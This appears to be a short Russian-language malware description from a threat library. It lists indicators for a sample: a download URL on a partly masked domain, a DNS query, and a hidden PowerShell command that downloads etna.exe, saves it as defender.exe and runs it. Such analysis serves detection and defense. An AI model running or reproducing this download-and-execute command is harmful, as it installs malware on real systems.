Техническая информация
- http://www.gc###usa.org/media/files/etna.exe как %temp%\defender.exe
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://www.gc###usa.org/media/files/etna.exe','%TEMP%\defender.exe') & %tmp%\defender.exe
- http://www.gc###usa.org/media/files/etna.exe
- DNS ASK gc###usa.org
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://www.gc###usa.org/media/files/etna.exe','%TEMP%\defender.exe') & %tmp%\defender.exe' (со скрытым окном)